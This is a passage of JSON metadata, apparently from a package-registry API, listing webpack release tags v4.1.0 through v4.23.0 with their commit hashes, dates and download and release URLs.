sitories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb7